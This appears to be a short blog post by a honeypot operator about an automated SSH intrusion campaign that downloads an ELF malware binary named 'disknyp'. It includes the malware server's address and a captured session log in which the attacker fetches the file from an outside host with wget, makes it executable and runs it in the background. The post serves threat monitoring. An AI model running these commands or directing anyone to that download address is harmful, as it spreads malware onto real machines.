spamversand

disknyp doesn’t seem to be a new thing..

In the paper:

 

141

PATTERNS AND PATTER  AN INVESTIGATION INTO  SSH ACTIVITY USINGKIPPO HONEYPOTS

CraigValli,PriyaRabadiaandAndrewWoodward

EdithCowanUniversity,Security

ResearchInstitute

Perth,Australia

c.valli@ecu.edu.au,prabadia@our.ecu.edu.au,a.woodward@ecu.edu.a

(to be found at http://ro.ecu.edu.au/cgi/viewcontent.cgi?article=1126&context=adf ) the download URL is already mentioned. Also clean-mx knows the file host; and on http://honey1.christiaan008.tk:8080/kippo-graph/kippo-input.php there is also a good look at these activities.

Meanwhile I captured  268 samples of disknyp.

Can be found on: http://198.2.192.204:22/disknyp

cool .. webserver on the ssh-port 🙂

The server answers with:

Content-Type: text/html
Content-Length: 4440
Accept-Ranges: bytes
Server: HFS 2.3 beta
Cache-Control: no-cache, no-store, must-revalidate, max-age=-1

Looks like the webserver running is from:

http://ha-hfs.googlecode.com/files/hfs2.3 beta271.exe

Also available for download on this webserver is a

svch.exe , probably infected for window-machines.

Virustotal says, only 24 from 48 antivir-vendors discover this

trojan.

Yesterday my ssh-honeypot captured 54 samples of “disknyp”.

All logins (probably automated) did the following:

**:~# rm -f disknyp
**:~# rm -f disknop
**:~# wget http://198.2.192.204:22/disknyp
–2013-12-01 03:58:03–  http://198.2.192.204:22/disknyp
Connecting to 198.2.192.204:22… connected.
HTTP request sent, awaiting response… 503 ?????????
**:~# chmod 0777 disknyp
**:~# nohup /root/disknyp > /dev/null 2>&1 &
bash: nohup: command not found
**x:>

The file is a 1491887 Bytes  ELF 32-bit LSB executable. I don’t know yet what it is doing..